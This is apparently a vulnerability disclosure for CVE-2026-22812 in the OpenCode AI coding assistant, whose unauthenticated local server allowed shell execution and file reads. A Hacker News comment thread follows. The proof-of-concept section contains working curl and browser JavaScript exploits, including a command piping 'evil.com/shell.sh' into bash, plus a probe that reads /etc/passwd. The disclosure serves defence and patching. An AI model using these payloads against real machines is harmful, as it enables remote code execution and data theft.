Unauthenticated remote code execution in OpenCode

2026-01-11 22:33 · cy.md

Affected software: OpenCode (npm: opencode-ai)
CVE: CVE-2026-22812

TL;DR:

  • Before v1.1.10, OpenCode automatically and silently started an unauthenticated web server which allowed connecting peers to execute arbitrary code.
  • Before v1.0.216, any website could execute arbitrary code on your machine if OpenCode was running — no user interaction or configuration necessary.
  • Since v1.1.10, the server is disabled by default, but when enabled (via flags or config) it remains completely unauthenticated.

OpenCode is an open-source AI coding assistant. Prior to v1.1.10, it automatically spawned an HTTP server (default port 4096+) on startup. Since v1.1.10, the server is disabled by default but can be enabled via command-line flags or configuration file. When running, the server exposes endpoints for:

  • Executing arbitrary shell commands (POST /session/:id/shell)
  • Creating interactive terminal sessions (POST /pty)
  • Reading arbitrary files (GET /file/content)
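For illustration, the file-read endpoint could presumably be hit with plain curl along these lines; note that the `path` query parameter name is a guess for illustration, not confirmed against the actual API:

```shell
# Probe the unauthenticated file-read endpoint; the "path" query parameter
# name is a guess for illustration. --max-time avoids hanging when no server
# is listening.
if curl -s --max-time 2 "http://127.0.0.1:4096/file/content?path=/etc/passwd"; then
  echo "request succeeded"
else
  echo "no server listening"
fi
```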

This server has no authentication. Any client that can connect to it gains full code execution with the privileges of the user running OpenCode. When the server is running, there is no visible indication to the user.

Note: The CORS policy hardcodes *.opencode.ai as an allowed origin. This means any page served from opencode.ai or its subdomains can access the server API when it's running. If opencode.ai is ever compromised, or an XSS vulnerability is found on any subdomain, attackers could exploit all users who have the server enabled.
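To see what that allowlist permits in practice, one can replay a browser-style request with a forged Origin header and look for a reflected Access-Control-Allow-Origin header (the docs.opencode.ai subdomain below is hypothetical, chosen only for illustration):

```shell
# Simulate a cross-origin call from an opencode.ai subdomain. If the server
# reflects the origin in Access-Control-Allow-Origin, a page on that origin
# could call the API from a browser. --max-time avoids hanging when no
# server is running.
curl -s -i --max-time 2 -X POST "http://127.0.0.1:4096/session" \
  -H "Origin: https://docs.opencode.ai" \
  -H "Content-Type: application/json" -d '{}' \
  | grep -i 'access-control' \
  || echo "no response (server not running) or origin not allowed"
```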

Attack Vectors

| Attack Vector | Affected Versions | Status | Vendor Advisory |
| --- | --- | --- | --- |
| Any website can execute code on any OpenCode user's machine | < 1.0.216 | Fixed in v1.0.216 | Silent fix |
| Any process on the local machine can execute code as the OpenCode user | < 1.1.10 | Mitigated in v1.1.10 | Silent fix |
| Any web page served from localhost/127.0.0.1 can execute code | < 1.1.10 | Mitigated in v1.1.10 | Silent fix |
| When server is enabled, any local process can execute code without authentication | All versions | Unfixed | None |
| When server is enabled, any web page served from localhost/127.0.0.1 can execute code | All versions | Unfixed | None |
| No indication when server is running (users may be unaware of exposure) | All versions | Unfixed | None |
| With --mdns, any machine on the local network can execute code | All versions | Unfixed | None |
| `*.opencode.ai` can execute code when server is running | All versions | Unfixed | None |
| If opencode.ai is compromised, attackers gain access to users with server enabled | All versions | Unfixed | None |
| Any XSS on opencode.ai can compromise users with server enabled | All versions | Unfixed | None |

Proof of Concept

Local Exploitation (when server is enabled)

Any process on the machine can execute commands when the server is running:

API="http://127.0.0.1:4096"
# Create a new session; no credentials are required
SESSION=$(curl -s -X POST "$API/session" -H "Content-Type: application/json" -d '{}' | jq -r '.id')
# Run an arbitrary shell command inside that session
curl -s -X POST "$API/session/$SESSION/shell" \
  -H "Content-Type: application/json" \
  -d '{"agent":"build","command":"id > /tmp/pwned.txt"}'

Browser-Based Exploitation (pre-v1.0.216)

Before the CORS fix, any website could silently exploit visitors:

// Step 1: create a session (no credentials needed)
fetch('http://127.0.0.1:4096/session', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: '{}'
}).then(r => r.json()).then(s => {
  // Step 2: run an attacker-controlled command in that session
  fetch(`http://127.0.0.1:4096/session/${s.id}/shell`, {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({agent:'build', command:'curl evil.com/shell.sh|bash'})
  })
})

Confirmed working in Firefox. Chrome's Local Network Access protection may prompt users.

Mitigations for Users

Immediate actions:

  • Check your version by running opencode --version
  • Update to v1.1.10 or newer to ensure the server is disabled by default
  • Check your config file for server.port or server.hostname settings which silently enable the server
  • Do not use the --mdns flag (binds to 0.0.0.0 without warning)
  • If you must enable the server, do not visit opencode.ai or any subdomains while it is running
  • Be aware that when the server is enabled, any local process can exploit it without authentication
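A quick self-check along these lines might look like the following; the config file path is an assumption, so adjust it to wherever your OpenCode config actually lives:

```shell
# 1. Version check: releases before v1.1.10 auto-start the server
command -v opencode >/dev/null 2>&1 && opencode --version || echo "opencode not installed"

# 2. Config that silently enables the server (path is a guess; adjust to
#    wherever your OpenCode config actually lives)
CONFIG="$HOME/.config/opencode/opencode.json"
[ -f "$CONFIG" ] && grep -nE '"(port|hostname)"' "$CONFIG" || echo "no server config found"

# 3. Is anything already listening on the default port?
(ss -ltn 2>/dev/null || netstat -an 2>/dev/null) | grep -q ':4096' \
  && echo "port 4096 in use" || echo "port 4096 free"
```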

Disclosure Timeline

| Date | Action | Response (at disclosure) |
| --- | --- | --- |
| 2025-11-17 | Reported via email to support@sst.dev per SECURITY.md | No response |
| 2025-12-27 | Filed GitHub Security Advisory | No response |
| 2025-12-29 | Issue independently publicly reported by another user | |
| 2025-12-30 | Partial fix: CORS restricted in v1.0.216 | |
| 2026-01-07 | Escalated to community Discord | No response |
| 2026-01-08 | Follow-up via issue comment | Upstream responded to issue |
| 2026-01-09 | Server disabled by default in v1.1.10 | |
| 2026-01-11 | Full public disclosure | |

Recommendations for Maintainers

  • Restrict CORS to the minimal required set (done in v1.0.216)
  • Disable server by default (done in v1.1.10)
  • Require authentication for all server requests
  • Clearly indicate to users when the server is running (e.g., startup message or persistent UI indicator)
  • Improve --mdns documentation to clearly explain it binds to 0.0.0.0 and allows any machine on the local network full access
  • Enforce TLS for server communication over network connections
  • Publish the GitHub Security Advisory and obtain CVE (CVE-2026-22812)
  • Ensure the security reporting email address is monitored
  • Ensure GHSA notifications are monitored
  • Clarify trust relationship between OpenCode maintainers, opencode.ai, and OpenCode users

Questions about this disclosure: cy.md



Comments

  • By thdxr 2026-01-12 19:15

    hey maintainer here

    we've done a poor job handling these security reports, usage has grown rapidly and we're overwhelmed with issues

    we're meeting with some people this week to advise us on how to handle this better, get a bug bounty program funded and have some audits done

    • By Imustaskforhelp 2026-01-12 19:37

      My original message was more positive, but after looking more into the context, I am a bit more pessimistic.

      Now I must admit that I am a little concerned by the fact that the vulnerability reporters tried multiple times to contact you, but to no avail. This is not a good look at all, and I hope you can fix it asap as you mention.

      I respect dax from the days of the SST framework, but this is genuinely such a bad look, especially when they reported on 2025-11-17 and got multiple "no responses" after repeated attempts to contact the maintainers...

      Sure, the bug is reported now, but who knows what might have already been happening: OpenCode was the most famous open source coding agent, so surely more security people were watching it, and from my understanding I can see a genuine possibility that black hat adversaries exploited something in the wild as well.

      I think this means that we should probably run these agents in gvisor or with proper sandboxing.

      Even right now, we don't know how many more such bugs might persist and can lead to even RCE.

      Dax, this short attention span would make every adversary look for even more bugs and RCE vulnerabilities right now as we speak, so in my opinion you only have a very finite amount of time. I hope things can move as fast as possible now to make OpenCode safer.

      • By thdxr 2026-01-12 19:56

        the email they found was from a different repo and not monitored. this is ultimately our fault for not having a proper SECURITY.md on our main repository

        the issue that was reported was fixed as soon as we heard about it - going through the process of learning about the CVE process, etc now and setting everything up correctly. we get 100s of issues reported to us daily across various mediums and we're figuring out how to manage this

        i can't really say much beyond this is my own inexperience showing

        • By varenc 2026-01-13 3:46

          Also consider putting a security.txt[0] file on your main domain, like here: https://opencode.ai/.well-known/security.txt

          I also just want to sympathize with the difficulty of spotting the real reports from the noise. For a time I helped manage a bug bounty program, and 95% of issues were long reports with plausible titles that ended up saying something like "if an attacker can access the user's device, they can access the user's device". Finding the genuine ones requires a lot of time and constant effort. Though you get a feel for it with experience.

          [0] https://en.wikipedia.org/wiki/Security.txt

          edit: I agree with the original report that the CORS fix, while a huge improvement, is not sufficient since it doesn't protect from things like malicious code running locally or on the network.

          edit2: Looks like you've already rolled out a password! Kudos.
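A minimal security.txt per RFC 9116, for reference (the contact address and URLs here are placeholders):

```
Contact: mailto:security@example.com
Expires: 2027-01-01T00:00:00.000Z
Preferred-Languages: en
Policy: https://example.com/security-policy
```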

          • By rando77 2026-01-13 10:51

            I've been thinking about using LLMs to help triage security vulnerabilities.

            If done in an auditably unlogged environment (with a limited output to the company, just saying escalate) it might also encourage people to share vulns they are worried about putting online.

            Does that make sense from your experience?

            [1] https://github.com/eb4890/echoresponse/blob/main/design.md

            • By varenc 2026-01-14 2:03

              I definitely think it's a viable idea! Someone like Hackerone or Bugcrowd would be especially well poised to build this since they can look at historical reports, see which ones ended up being investigated or getting bounties, and use that to validate or inform the LLM system.

              The 2nd order effects of this, when reporters expect an LLM to be validating their report, may get tricky. But ultimately if it's only passing a "likely warrants investigation" signal and has very few false negatives, it sounds useful.

              With trust and security though, I still feel like some human needs to be ultimately responsible for closing each bad report as "invalid" and never purely relying on the LLM. But it sounds useful for elevating valid high severity reports and assisting the human ultimately responsible.

              It does feel like a hard product to build from scratch, though easy for existing bug bounty systems to add.

        • By KolenCh 2026-01-13 10:43

          I learnt this the hard way: if you send multiple emails with seemingly very important titles and messages and get no reply at all, the receiver likely hasn't received your email rather than deliberately ghosting you. Everyone should know this and at least try a different channel of communication before taking further action, especially when disclosing a vulnerability.

        • By Imustaskforhelp 2026-01-12 23:55

          Thanks for providing additional context. I appreciate that you are admitting fault where it lies; that's okay, because it's human to make errors, and I have full faith from your response that OpenCode will learn from them.

          I might try OpenCode once it gets patched, or after watching the community for a while. Wishing you the best of luck for a more secure future for opencode!

        • By BoredPositron 2026-01-13 8:44

          Fixed? You just changed it to be off by default, shifting the security burden to your users. It's not fixed; it's buried with minimal mitigation, and you give your users no indication that enabling it makes their machine vulnerable. Shady.

        • By euazOn 2026-01-12 20:16

          I am also baffled at how long this vulnerability was left open, but I’m glad you’re at least making changes to hopefully avoid such mistakes in the future.

          Just a thought, have you tried any way to triage these reported issues via LLMs, or constantly running an LLM to check the codebase for gaping security holes? Would that be in any way useful?

          Anyway, thanks for your work on opencode and good luck.

      • By jannniii 2026-01-13 17:14

        They are a small team and the tool has gotten wildly popular. Which is not to say that slowing down to address quality and security issues would be a bad idea.

        I’ve been an active user of opencode for 7-8 months now, really like the tool, but beginning to get a feeling that the core team’s idea of keeping the core development to themselves is not going to scale any longer.

        Really loving opencode though!

    • By Rygian 2026-01-13 8:36

      Don't waste your time and money on funding bug bounties or "getting audits done". Your staff will add another big security flaw just the next day, back to square one.

      Spend that money on reorganizing your management and training your staff so that everyone in your company is on board with https://owasp.org/Top10/2025/A06_2025-Insecure_Design/ .

      • By staticassertion 2026-01-13 12:41

        If part of the problem was that no one was responding to a vulnerability report then a bug bounty program would potentially address that.

        • By liveoneggs 2026-01-13 14:14

          you just get spammed with the same three fake reports over and over

          • By staticassertion 2026-01-13 15:00

            Triage is something that these services provide, exactly to deal with that.

      • By liveoneggs 2026-01-13 14:15

        good try :)

    • By bopbopbop7 2026-01-12 19:55

      Why not just ask Claude to fix the security issues and make sure they don't happen again?

      • By Hamuko 2026-01-12 20:26

        And if you don't have a Claude subscription, you can just ask your friends to fix them via the remote code execution server.

        • By reactordev 2026-01-13 1:17

          There goes my discord side hustle, offering Claude code through your OpenCode.

      • By Y_Y 2026-01-12 20:28

        Talk about kicking someone while they're down...

        • By lostmsu 2026-01-13 13:52

          I imagine Claude would be able to at least fix this one.

          • By 0x500x79 2026-01-13 16:03

            I imagine Claude helped write this one.

      • By croes 2026-01-12 22:04

        Who knows what created the issues in the first place

    • By digdugdirk 2026-01-12 19:23

      I've been curious how this project will grow over time, it seems to have taken the lead as the first open source terminal agent framework/runner, and definitely seems to be growing faster than any organization would/could/should be able to manage.

      It really seems like the main focus of the project should be in how to organize the work of the project, rather than on the specs/requirements/development of the codebase itself.

      What are the general recommendations the team has been getting for how to manage the development velocity? And have you looked into various anarchist organizational principles?

    • By observationist 2026-01-12 23:25

      Good luck, and thank you for eating the accountability sandwich and being up front about what you're doing. That's not always easy to do, and it's appreciated!

    • By heliumtera 2026-01-12 19:44

      Congrats on owning this, good job, respect

      • By shimman 2026-01-12 20:27

        It's hard to not own it when it's publicly disclosed. Maybe save the accolades for when they actually do something and not just say something.

        • By tommica 2026-01-12 21:18

          [flagged]

          • By shimman 2026-01-12 22:30

            In my limited existence on this earth, talk is very cheap and actions should matter more.

            • By Gigachad 2026-01-12 23:37

              Good idea. Start sending in some PRs to contribute then.

              • By shimman 2026-01-13 2:13

                Unless they've recently invented a shitpost to typescript compiler, I'm afraid I'll have to devote my time elsewhere.

                • By maxbond 2026-01-13 6:26

                  Your time is your own but I feel compelled to point out that is in fact one of the things a coding assistant does.

    • By cryptonector 2026-01-14 6:44

      For one thing spend a lot more time analyzing your code for these bugs. Use expert humans + LLMs to come up with an analysis plan then use humans + LLMs to execute the plan.

    • By dionian 2026-01-13 15:56

      I don't know much about your product, but I have to say that hearing this kind of blunt communication is really refreshing

    • By rtaylorgarlock 2026-01-12 19:34

      Respect for openness. Good work and good luck.

      • By Rygian 2026-01-13 8:33

        I don't understand what is being encouraged here.

        Something is seriously wrong when we say "hey, respect!" to a company that develops an unauthenticated RCE feature which should stand out glaringly [0] during any internal security analysis, on software that they license in exchange for money [1], and that then fumbles and drops the ball on security reports when someone does their due diligence for them.

        If this company wants to earn any respect, they need at least to publish their post-mortem about how their software development practices allowed such a serious issue to reach shipping.

        This should come as a given, especially seeing that this company already works on software related to security (OpenAuth [2]).

        [0] https://owasp.org/Top10/2025/ - https://owasp.org/Top10/2025/A06_2025-Insecure_Design/ - https://owasp.org/Top10/2025/A01_2025-Broken_Access_Control/ - https://owasp.org/Top10/2025/A05_2025-Injection/

        [1] https://opencode.ai/enterprise

        [2] https://anoma.ly/

        • By Cornbilly 2026-01-13 15:12

          I’ve noticed this a lot with startup culture.

          It’s like an unwritten rule to only praise each other because to give honest criticism invites people to do the same to you and too much criticism will halt the gravy train.

          • By rtaylorgarlock 2026-01-13 18:09

            I've struggled a bit on this: LinkedIn's positivity echo chamber vs. the negativity-rewarding dunk culture here. No greater power exists on HN than critical thinking using techno-logic in a negative direction, revenue and growth be damned.

            Opencode don't have to maintain Zen for so cheaply. I don't have to say anything positive nor encouraging, just like I don't have to sh!t on youtuber 'maintainers' to promise incredible open source efforts which do more to prove they should stick to videos rather than dev. Idk. Not exactly encouraging me to comment at effing all if any positivity or encouragement is responded with the usual "hm idk coach better check yoself" ya honestly I think i know exactly what to do

        • By GoblinSlayer 2026-01-13 9:17

          Honestly RCE here is in the browser. Why the browser executes any code in sight and this code can do anything?

          • By Rygian 2026-01-13 9:25

            It's called "the world wide web" and it works on the principle that a webpage served by computer A can contain links that point to other pages served by computer B.

            Whether that principle should have been sustained in the special case of "B = localhost" is a valid question. I think the consensus from the past 40 years has been "yes", probably based on the amount of unknown failure possibilities if the default was reversed to "no".

            • By GoblinSlayer 2026-01-13 10:40

              owasp A01 addresses this: Violation of the principle of least privilege, commonly known as deny by default, where access should only be granted for particular capabilities, roles, or users, but is available to anyone.

              Indeed, deny by default policy results in unknown failure possibilities, it's inherent to safety.

              • By pixl97 2026-01-13 14:49

                >Violation of the principle of least privilege

                I completely agree with this, programs are too open most of the time.

                But, this also brings up a conundrum...

                Programs that are wide open and insecure are typically very forgiving of user misconfigurations and misunderstandings, so they are the ones that end up widely adopted. A secure-by-default application takes much more knowledge to use in most cases; even though it protects the end user better, it sees less distribution unless forced by some other mechanism such as compliance.

    • By falloutx 2026-01-12 21:09

      Its okay, if you can fix it soon, it should be fine.

  • By kaliszad 2026-01-12 23:37

    Many people seem to be running OpenCode and similar tools on their laptop with basically no privilege separation, sandboxing, or fine-grained permission settings in the tool itself. This tendency is also reflected in how many plugins are designed, where the default assumption is that the tool is running unrestricted on the computer next to some kind of IDE: many authentication callbacks go to some port on localhost, and the fallback is to parse the right parameter out of the callback URL. Also, for some reason these tools tend to be relative resource hogs even when just waiting for a reply from a remote provider. I mean, I am glad they exist, but it all seems very rough around the edges compared to how much attention these tools get nowadays.

    Please run at least a dev-container or a VM for these tools. You can use RDP/VNC/Spice or even just the terminal with tmux to work within the confines of the container/machine. You can mirror some stuff into the container/machine with SSHFS, Samba/NFS, or 9p. You can use all the traditional tools, filesystems and such for reliable snapshots. Push the results separately, or don't give the agent direct unrestricted git access.

    It's not that hard. If you are super lazy, you can also pay $5/month or so for a VPS and run the workload there.
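That workflow can be sketched with a throwaway container; the image choice and the global npm install below are assumptions, so adapt them to your own toolchain:

```shell
# Throwaway sandbox: mount only the current project, drop extra privileges.
# The node:22 image and global install of the opencode-ai package are
# assumptions; swap in whatever base image your project needs.
docker run --rm -it \
  -v "$PWD":/work -w /work \
  --cap-drop ALL --security-opt no-new-privileges \
  node:22 \
  bash -c "npm install -g opencode-ai && opencode"
```

Anything the agent breaks stays inside the container, and deleting it (`--rm`) discards all changes outside the mounted project directory.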

    • By tomrod 2026-01-13 1:37

      Hi.

      > Please run at least a dev-container or a VM for the tools.

      I would like to know how to do this. Could you share your favorite how-to?

      • By kaliszad 2026-01-13 3:08

        I have a pretty non-standard setup but with very standard tools. I didn't follow any specific guide. I have ZFS as the filesystem, for each VM a ZVOL or dataset + raw image, and libvirt/KVM on top. This can be done using e.g. Debian GNU/Linux in a fairly straightforward way. You can probably do something like it in WSL2 on Windows (although that doesn't really sandbox much), or with Docker/Podman, or with VirtualBox.

        If you want a dedicated virtual host, Proxmox seems to be pretty easy to install even for relative newcomers and it has a GUI that's decent for new people and seasoned admins as well.

        For the remote connection I just use SSH and tmux, so I can comfortably detach and reattach without killing the tool that's running inside the terminal on the remote machine.

        I hope this helps even though I didn't provide a step-by-step guide.

      • By ciberado 2026-01-13 14:28

        If you are using VSCode against WSL2 or Linux and you have installed Docker, managing devcontainers is very straightforward. What I usually do is to execute "Connect to host" or "Connect to WSL", then create the project directory and ask VSCode to "Add Dev Container Configuration File". Once the configuration file is created, VSCode itself will ask you if you want to start working inside the container. I'm impressed with the user experience of this feature, to be honest.

        Working with devcontainers from CLI wasn't very difficult [0], but I must confess that I only tested it once.

        [0] https://containers.dev/supporting
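The configuration file that flow creates can be as small as this sketch (the image tag and post-create command are assumptions, not verbatim VSCode output):

```json
{
  "name": "agent-sandbox",
  "image": "mcr.microsoft.com/devcontainers/typescript-node:22",
  "postCreateCommand": "npm install -g opencode-ai"
}
```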

      • By AdieuToLogic 2026-01-13 4:15

        >> Please run at least a dev-container or a VM for the tools.

        > I would like to know how to do this. Could you share your favorite how-to?

        See: https://www.docker.com/get-started/

        EDIT:

        Perhaps you are more interested in various sandboxing options. If so, the following may be of interest:

        https://news.ycombinator.com/item?id=46595393

        • By nyrikki 2026-01-13 15:56

          Note that while containers can be leveraged to run processes at lower privilege levels, they are not secure by default, and actually run at elevated privileges compared to normal processes.

          Make sure the agent cannot launch containers and that you are switching users and dropping privileges.

          On a Mac you are running a VM, which helps, but on Linux the user is responsible for constraints, and by default it is trivial to bypass.

          Containers have been fairly successful for security because the most popular images have been leveraging traditional co-hosting methods, like nginx dropping root etc…

          By themselves without actively doing the same they are not a security feature.

          While there are some reactive defaults, Docker places the responsibility for dropping privileges on the user and image. Just launching a container is security through obscurity.

          It can be a powerful tool to improve security posture, but don’t expect it by default.

      • By yawaramin 2026-01-13 3:53

        Hi. You are clearly an LLM user. Have you considered asking an LLM to explain how to do this? If not, why not?

        • By exe34 2026-01-13 7:42

          would an LLM have a favourite tool? I'm sure it'll answer, but would it be from personal experience?

          • By yawaramin 2026-01-13 15:38

            I checked with Gemini 3 Fast and it provided instructions on how to set up a Dev Container or VM. It recommended a Dev Container and gave step-by-step instructions. It also mentioned VMs like VirtualBox and VMWare and recommended best practices.

            This is exactly what I would have expected from an expert. Is this not what you are getting?

            My broader question is: if someone is asking for instructions for setting up a local agent system, wouldn't it be fair to assume that they should try using an LLM to get instructions? Can't we assume that they are already bought in to the viewpoint that LLMs are useful?

            • By exe34 2026-01-13 16:53

              the llm will comment on the average case. when we ask a person for a favourite tool, we expect anecdotes about their own experience - I liked x, but when I tried to do y, it gave me z issues because y is an unusual requirement.

              when the question is asked on an open forum, we expect to get n such answers and sometimes we'll recognise our own needs in one or two of them that wouldn't be covered by the median case.

              does that make sense?

              • By yawaramin 2026-01-13 18:20

                > when we ask a person for a favourite tool

                I think you're focusing too much on the word 'favourite' and not enough on the fact that they didn't actually ask for a favourite tool. They asked for a favourite how-to for using the suggested options, a Dev Container or a VM. I think before asking this question, if a person is (demonstrably in this case) into LLMs, it should be reasonable for them to ask an LLM first. The options are already given. It's not difficult to form a prompt that can make a reasonable LLM give a reasonable answer.

                There aren't that many ways to run a Dev Container or VM. Everyone is not special and different, just follow the recommended and common security best practices.

          • By cbm-vic-20 2026-01-13 13:19

            In 2026? It will be the tool from the vendor who spends the most ad dollars with Anthropic/Google/etc.

        • By tomrod 2026-01-14 12:04

          Because I value human input too.

    • By indigodaddy 2026-01-14 15:08

      I've started a project [1] recently that tries to implement this sandbox idea. Very new and extremely alpha, but it mostly works as a proof of concept (except I haven't figured out how to get Shelley working yet). I'm sure there are a ton of bugs and things to work through, but it could be fun to test and experiment with in a vps and report back any issues.

      [1] https://github.com/jgbrwn/shelley-lxc

    • By _zoltan_ 2026-01-13 8:26

      Claude asks you for permissions every time it wants to run something.

      • By estsauver 2026-01-13 9:05

        Until you run --dangerously-skip-permissions

      • By xmcqdpt2 2026-01-13 12:58

        That's why you run with "dangerously allow all." What's the point of LLMs if I have to manually approve everything? IME you only get half decent results if the agent can run tests, run builds and iterate. I'm not going to look at the wall of texts it produces on every iterations, they are mostly convincing bullshit. I'll review the code it wrote once the tests pass, but I don't want to be "in the loop".

    • By Imustaskforhelp 2026-01-12 23:46

      I really like https://sprites.dev/, the product created by fly.io, effectively sandboxes for AI agents. I feel like it's really apt here (not sponsored lmao, wish I was).

      Oh btw, if someone wants to run servers via qemu, I highly recommend quickemu. It provides default ssh access, sshfs, vnc, spice and all such ports (to just your local device, of course), and also allows one to install debian or any distro (out of many, many distros) using quickget.

      Its really intuitive for what its worth, definitely worth a try https://github.com/quickemu-project/quickemu

      I personally really like zed with ssh open remote. I can always open up terminals in it and use claude code or opencode or any other, and they provide AI as well (I don't use much AI this way; I make simple scripts for myself, so I just copy-paste for free from the websites), but I can recommend zed for what it's worth as well.

  • By throw_me_uwu 2026-01-12 21:12

    WTF, they didn't just make an unauthenticated RCE HTTP endpoint, they also helpfully added a CORS bypass for it... all in a CLI tool? That silently starts an HTTP server??

HackerNews